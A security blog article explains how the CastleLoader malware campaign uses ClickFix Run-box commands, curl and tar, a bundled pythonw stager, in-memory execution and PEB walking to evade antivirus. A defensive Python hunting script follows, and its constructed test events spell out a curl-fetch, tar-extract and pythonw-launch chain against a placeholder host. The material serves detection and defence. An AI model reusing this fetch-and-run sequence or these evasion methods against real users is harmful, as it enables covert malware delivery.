👤 AUDITWOLF
🗓️ 11 Dec 2025  

Python Undercover: How CastleLoader’s New Tactics Slip Past Security Defenses

Subtitle: Cybercriminals turn to Python and stealthy scripting to supercharge CastleLoader, leaving traditional antivirus tools in the dust.

It starts with a simple prompt: “Press Win + R and enter this command.” For unsuspecting victims, this seemingly harmless instruction is the gateway to a sophisticated new malware campaign. CastleLoader, a malicious tool first flagged last year, is back - and it’s smarter, stealthier, and more elusive than ever, thanks to a cunning use of Python scripting. Security researchers warn this evolution could signal a new era of hard-to-detect cyberattacks targeting everyday users and businesses alike.

The Anatomy of a Modern Malware Attack

CastleLoader’s latest campaign, uncovered by Blackpoint Cyber’s Adversary Pursuit Group, reveals a shift in the malware’s delivery and execution methods. Historically, attackers used a phishing trick known as “ClickFix,” where victims are duped into pasting a command into the Windows Run box. That single command quietly leverages two utilities that ship with modern Windows - curl.exe and tar - to fetch an archive and unpack it into a concealed folder, so nothing the victim would recognize as a download or installer ever appears. Because both tools are signed Microsoft binaries, the fetch-and-unpack step itself looks like ordinary system activity.

The real innovation, however, is in what happens next. Instead of dropping an obvious executable file, CastleLoader now launches a tiny Python script with pythonw.exe, the console-less variant of the interpreter, so no command window ever appears. Windows does not ship Python, so the unpacked archive has to carry its own interpreter alongside the script. Running invisibly, the script reconstructs the malware and executes it directly in memory. The stager and interpreter do sit on disk, but the final payload is never written out as a standalone executable, which is why this “fileless” approach leaves file-scanning antivirus tools with nothing to hash or block.

Researchers found that the attackers employ further evasion techniques: executing pre-compiled Python bytecode rather than readable source, loading shellcode straight into memory, and PEB walking - resolving the addresses of Windows API functions by traversing the Process Environment Block’s list of loaded modules and their export tables instead of calling the usual lookup routines, so the code carries no telltale imports for a scanner to flag. Once established, CastleLoader connects to its control server, using a unique “GoogeBot” User-Agent string as a calling card, and downloads whatever payload the attackers choose, from remote access trojans to info-stealers such as Stealc and RedLine.

What Can Be Done?

Experts warn that the weakest link remains human curiosity and trust. The “ClickFix” ruse relies on people following instructions that seem legitimate. Blackpoint’s team urges organizations to train users to be wary of any prompts to use the Windows Run dialog, especially for supposed “fixes” or verifications.

Administrators should consider restricting the Run box, command-line tools, and Python interpreters for everyday users, while recognizing that a blocked Run dialog alone does not end ClickFix, since the same pasted command runs just as well from a terminal or another launch point. The more durable control is monitoring: curl.exe or tar.exe spawned by a shell that Explorer started (the signature of a pasted Win + R command), pythonw.exe or python.exe executing from a user-writable location such as AppData or Temp, and outbound requests carrying the “GoogeBot” User-Agent. As malware authors embrace more flexible and evasive programming languages, defenders will need to adapt just as quickly.
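The delivery chain the article describes (Run box, curl.exe and tar, then pythonw.exe from a hidden folder, then the GoogeBot beacon) maps onto three simple hunting rules over process-creation telemetry and proxy logs. The block below is an added example written for this article, not Blackpoint Cyber’s detection content. It assumes Sysmon-style event fields (`Image`, `ParentImage`, `CommandLine`) plus a `GrandParentImage` enrichment field that stock Sysmon does not record and a real pipeline would derive by joining on parent process IDs; the events and proxy lines are constructed for the demo and contain no real indicators beyond the User-Agent string the article names.

```python
"""Hunt for a CastleLoader-style ClickFix delivery chain in telemetry.

Added example (not from the article or Blackpoint Cyber). Three rules:
  R1  curl.exe / tar.exe under a shell whose own parent is explorer.exe,
      which is what a command pasted into Win + R looks like in telemetry
  R2  a Python interpreter executing from a user-writable path
  R3  an outbound request whose User-Agent is exactly "GoogeBot"
"""
import re
from pathlib import PureWindowsPath

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
FETCH_TOOLS = {"curl.exe", "tar.exe"}
PYTHON = {"pythonw.exe", "python.exe"}


def _basename(path):
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def rule_clickfix_fetch(ev):
    """R1: curl/tar spawned by a shell that Explorer itself started."""
    return (_basename(ev["Image"]) in FETCH_TOOLS
            and _basename(ev["ParentImage"]) in SHELLS
            and _basename(ev.get("GrandParentImage", "")) == "explorer.exe")


def rule_python_userpath(ev):
    """R2: python.exe / pythonw.exe running out of AppData, Temp or Public."""
    img = ev["Image"].lower()
    return _basename(img) in PYTHON and any(d in img for d in USER_WRITABLE)


# Last quoted field on a combined-format proxy/web log line is the User-Agent.
UA_RE = re.compile(r'"(?P<ua>[^"]*)"\s*$')


def rule_googebot_ua(line):
    """R3: exact match on the article's GoogeBot User-Agent (not Googlebot)."""
    m = UA_RE.search(line)
    return bool(m) and m.group("ua") == "GoogeBot"


def hunt(events, proxy_lines):
    """Return a list of (rule_id, evidence) findings."""
    findings = []
    for ev in events:
        if rule_clickfix_fetch(ev):
            findings.append(("R1_clickfix_fetch", ev["CommandLine"]))
        if rule_python_userpath(ev):
            findings.append(("R2_python_userpath", ev["Image"]))
    for line in proxy_lines:
        if rule_googebot_ua(line):
            findings.append(("R3_googebot_ua", line))
    return findings


# Constructed telemetry, not real incident data. GrandParentImage is an assumed
# enrichment field (stock Sysmon only records ParentImage).
EVENTS = [
    {"GrandParentImage": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -s -o C:\Users\u\AppData\Local\Temp\p.tar https://example.invalid/p"},
    {"GrandParentImage": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\tar.exe",
     "CommandLine": r"tar -xf C:\Users\u\AppData\Local\Temp\p.tar -C C:\Users\u\AppData\Local\x"},
    {"GrandParentImage": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Users\u\AppData\Local\x\pythonw.exe",
     "CommandLine": r"pythonw.exe C:\Users\u\AppData\Local\x\s.py"},
    {"GrandParentImage": r"C:\Windows\System32\services.exe",   # legitimate; must not fire
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files\Python312\python.exe",
     "CommandLine": r"python.exe -m pip list"},
]
PROXY = [
    '10.0.0.5 - - [11/Dec/2025:10:00:01 +0000] "GET /api/c HTTP/1.1" 200 512 "-" "GoogeBot"',
    '10.0.0.5 - - [11/Dec/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1)"',
]

if __name__ == "__main__":
    for rule, evidence in hunt(EVENTS, PROXY):
        print(rule, "->", evidence)
```

Against the constructed data this yields two R1 hits (the curl and tar steps), one R2 hit for pythonw.exe in AppData, and one R3 hit, while the system-installed python.exe and the genuine Googlebot User-Agent stay silent. R1 is the rule worth keeping even after the User-Agent changes, because it keys on how ClickFix is executed rather than on what it downloads; expect to tune it for help-desk scripts and developers who legitimately call curl from a shell.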

Tags: CastleLoader, Python scripting, Cybersecurity

Cyber Audit Commander